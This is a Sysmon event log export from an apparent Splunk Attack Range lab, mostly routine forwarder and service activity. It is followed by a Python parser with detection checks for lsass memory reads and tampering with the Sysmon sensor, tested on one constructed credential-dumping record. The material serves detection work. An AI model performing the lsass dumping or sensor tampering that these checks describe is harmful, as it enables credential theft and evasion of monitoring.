19:18:11.318{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095089Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:11.318{761B69BB-818A-607D-0500-00000000BA01}408412C:\Windows\system32\csrss.exe{761B69BB-7A73-6080-975F-00000000BA01}2460C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001095088Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:11.318{761B69BB-8200-607D-A100-00000000BA01}41483464C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{761B69BB-7A73-6080-975F-00000000BA01}2460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001095087Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:11.317{761B69BB-7A73-6080-975F-00000000BA01}2460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{761B69BB-818A-607D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 11241100x80000000000000001606078Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:11.129{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606077Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:11.129{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=03A08DBB8775290273C26059BFF42C47,SHA256=1A5018D494064382AD4291719A90F3D48941AAA4902A013D1C7AF8FF8D076DDAfalsefalse - insufficient disk space 11241100x80000000000000001606076Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:11.129{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606075Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:11.129{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1FB4D18D5B6D747CF98FC3998CBF4C46,SHA256=F48EAE814EF2C169914B730A3EF622690CD6851796E62159CC0C5E18C77C8137falsefalse - 
insufficient disk space 11241100x80000000000000001606085Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:12.886{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606084Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:12.886{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69D115421D77C49A89A240C24C26B226,SHA256=B3A6A1F4D0ECBE2FD55BDA5698EF29AECA1A3E6F0A83CAAA6DF16F8D73131170falsefalse - insufficient disk space 10341000x80000000000000001095101Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:12.497{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095100Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:18:12.497{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095099Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:12.319{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3195288A9272B87B04FA7E67265008C0,SHA256=F6D04CC2A3B1D0804C87412B22CB0CE696FC81DC9A9360FF1ED11A0CD244588A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001095098Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:12.086{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5905F7B3FD8F41C1E3AAD3CB2FF07DD0,SHA256=3C65B0A6822DF4724EF73CBB6430F77708797138714FB5F2DFF288F4FEAE6F4C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001606083Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:09.630{21761711-8431-607D-C500-00000000BB01}3840C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 
AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-5.attackrange.local49728-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x80000000000000001606082Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:12.047{21761711-83AE-607D-1100-00000000BB01}968C:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.dat2021-04-19 13:21:46.711 23542300x80000000000000001606081Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:12.046{21761711-83AE-607D-1100-00000000BB01}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=15CF7B118947587CB706FEDAAC5FDFB2,SHA256=9139EA1B69B6608A2CEC637235415A6A2558D25E62A84C341FC2C328C64BB808falsefalse - insufficient disk space 10341000x80000000000000001095104Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:13.498{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095103Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:18:13.498{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095102Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:13.094{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE4175A013CCBD7787FE96923412A932,SHA256=F1F245FFA38F10CAD4054493E4A921667DA7939B8AF618DCEB7BFE1594C06F08,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001095109Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:09.648{761B69BB-8207-607D-CF00-00000000BA01}4116C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-982.attackrange.local1146-false10.0.1.12-8000- 10341000x80000000000000001095108Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:18:14.499{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095107Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:14.499{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095106Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:14.155{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=08BD217A317CB9299CC391EAF4097A89,SHA256=4825FA2B47CF15502040557A8089C8515E01C0DE7D6A10757FD4B4A534BACE53,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001095105Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:14.102{761B69BB-820D-607D-D800-00000000BA01}1064NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D20D8ADB80EA00B5D034835458864A3C,SHA256=76AB9735D98439220E08AE9B7AD88A44E48580ABDB2D15288A6668F57C0E4D03,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606087Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:14.036{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606086Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:14.036{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB0DBBDFF0FF1D3978C143A8204177D0,SHA256=F37F2104C2CBA7A96A12613D4F5D9565DC964C0F88D0C85F13B8CC0E1C0C82D2falsefalse - insufficient disk space 10341000x80000000000000001095112Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:15.500{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001095111Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:15.500{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095110Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:15.111{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6FC5D6FFBEA8F9CB3E1BE1FB633815BD,SHA256=9051103DBF167BC64F4A10FF372AC037522AF518DF334FC745EAF746FAA21B27,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606091Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:15.060{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xml2021-04-19 13:22:46.774 23542300x80000000000000001606090Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:15.060{21761711-842A-607D-9700-00000000BB01}3716NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=E21F5C2105D3482548EE1DCEAA8E3F18,SHA256=A62C5AB5FD16B72845400EE5338C4D5D0AC27884510730AA80A58BEA4A9B021Efalsefalse - insufficient disk space 
11241100x80000000000000001606089Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:15.038{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606088Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:15.038{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35F7E499831F8E8DC7EB3D94886DDE88,SHA256=9B5A3DC3FDD594EBEFDA47ADE8ACD26D8AA31A97CCDEDBDAEDC95CE083DF2E72falsefalse - insufficient disk space 354300x80000000000000001095117Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:11.851{761B69BB-819C-607D-2800-00000000BA01}2912C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-982.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-982.attackrange.local60543- 10341000x80000000000000001095116Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:16.501{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
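The records above are Sysmon events exported with their field delimiters stripped, so EventCode, Version, Level, Task, Opcode, Keywords and RecordNumber run together at the start of each record and, in Event ID 10, SourceProcessId and SourceThreadId are fused into one run of digits. The parser below is an added example and not part of the Attack Range export: it decodes the shared prefix (relying on Task always equalling EventCode and Keywords being a 64-bit value), parses the ProcessAccess tail, resolves fused PID/TID pairs where Windows' multiple-of-4 rule makes that unambiguous, and runs a field-aware check (TargetImage and GrantedAccess) instead of a substring grep for `lsass.exe`. Field order follows the Sysmon event schema; the access-right constants are the winnt.h process rights. The sample records are copied from this page with call traces cut short, and the one with RecordNumber 9999999 (`dumper.exe`) is constructed purely to exercise the check.

```python
"""Decode the delimiter-less Sysmon records on this page and run a field-aware
ProcessAccess (Event ID 10) check over them. Added example, not part of the
Attack Range export; field order follows the Sysmon event schema."""
import re

# Shared prefix: EventCode Version Level Task Opcode Keywords RecordNumber
# Channel Computer RuleName("-") UtcTime {ProcessGuid}. Task always equals
# EventCode (the (?P=eid) back-reference) and Keywords is a 64-bit value, so
# exactly 16 hex digits belong to it; those two facts make the digits decodable.
PREFIX = re.compile(
    r"^(?P<eid>\d{1,2})(?P<ver>\d)(?P<lvl>\d)(?P=eid)(?P<op>\d)"
    r"(?P<kw>0x[0-9A-Fa-f]{16})(?P<rec>\d+)Microsoft-Windows-Sysmon/Operational"
    r"(?P<host>.+?)-(?P<utc>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{3})"
    r"\{(?P<guid>[0-9A-Fa-f-]{36})\}(?P<rest>.*)$", re.S)
# Event ID 10 tail: SourceProcessId and SourceThreadId fused, SourceImage,
# {TargetProcessGUID}, TargetProcessId, TargetImage, GrantedAccess, CallTrace.
# Anchoring the trace on a drive letter stops the hex GrantedAccess from
# swallowing the "C" of "C:\".
ACCESS = re.compile(
    r"^(?P<src_ids>\d+)(?P<src_img>.+?)\{(?P<tgt_guid>[0-9A-Fa-f-]{36})\}"
    r"(?P<tgt_pid>\d+)(?P<tgt_img>.+?)(?P<access>0x[0-9A-Fa-f]+?)"
    r"(?P<trace>[A-Za-z]:\\.*)$", re.S)
# Other event types: ProcessId, then (for ID 23) User, then Image.
OTHER = re.compile(r"^(?P<pid>\d+)(?P<pre>.*?)(?P<img>[A-Za-z]:\\.*?\.exe)", re.S)
PROCESS_TERMINATE, PROCESS_VM_READ, PROCESS_VM_WRITE = 0x0001, 0x0010, 0x0020

# Records copied from the export above (call traces cut short), plus one
# CONSTRUCTED record (RecordNumber 9999999, dumper.exe) to exercise the check.
SAMPLES = [
    r"10341000x80000000000000001095121Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:17.535{761B69BB-818A-607D-0B00-00000000BA01}6326300C:\Windows\system32\lsass.exe{761B69BB-8188-607D-0100-00000000BA01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2",
    r"10341000x80000000000000001095083Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:10.654{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18",
    r"10341000x80000000000000001095078Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:10.653{761B69BB-8200-607D-A100-00000000BA01}41483464C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{761B69BB-7A72-6080-965F-00000000BA01}6360C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860",
    r"354300x80000000000000001095109Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:09.648{761B69BB-8207-607D-CF00-00000000BA01}4116C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-982.attackrange.local1146-false10.0.1.12-8000-",
    r"23542300x80000000000000001606073Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:10.797{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5DCB212847CFD062AA02CB6A01F70F1D,SHA256=BA900A8A42ADB46E9569B93CB1741326C874802270C95EDE823B85EBA4E150EBfalsefalse - insufficient disk space",
    r"10341000x80000000000000009999999Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:20:00.000{21761711-0000-607D-0000-00000000BB01}41962040C:\Users\Public\dumper.exe{21761711-0001-607D-0001-00000000BB01}700C:\Windows\system32\lsass.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6134|UNKNOWN(00007FF6A0001234)",
]


def parse_record(raw):
    """Return a dict of decoded fields, or None when the prefix does not match."""
    m = PREFIX.match(raw.strip())
    if not m:
        return None
    ev = {"eid": int(m["eid"]), "rec": int(m["rec"]), "host": m["host"],
          "utc": m["utc"], "guid": m["guid"], "raw": raw}
    tail = (ACCESS if ev["eid"] == 10 else OTHER).match(m["rest"])
    if tail:
        ev.update(tail.groupdict())
        for k in ("tgt_pid", "pid"):
            if k in ev:
                ev[k] = int(ev[k])
        if "access" in ev:
            ev["access"] = int(ev["access"], 16)
    return ev


def split_pid_tid(fused, known_pids=frozenset()):
    """Candidate (pid, tid) splits of a fused SourceProcessId+SourceThreadId.
    Windows PIDs and TIDs are multiples of 4 without leading zeros; splits whose
    PID was seen unfused elsewhere in the export win, otherwise all survive."""
    cands = []
    for i in range(1, len(fused)):
        p, t = fused[:i], fused[i:]
        if p[0] == "0" or t[0] == "0" or len(p) > 5 or len(t) > 5:
            continue
        if int(p) % 4 == 0 and int(t) % 4 == 0:
            cands.append((int(p), int(t)))
    preferred = [c for c in cands if c[0] in known_pids]
    return preferred or cands


def check_access(ev):
    """Field-aware checks on one Event ID 10 record; returns a list of findings."""
    findings = []
    tgt = ev.get("tgt_img", "").lower()
    if tgt.endswith("\\lsass.exe") and ev["access"] & PROCESS_VM_READ:
        findings.append("lsass memory read from %s" % ev["src_img"])
    if tgt.endswith("\\sysmon64.exe") and ev["access"] & (PROCESS_TERMINATE | PROCESS_VM_WRITE):
        findings.append("sensor tampering from %s" % ev["src_img"])
    return findings

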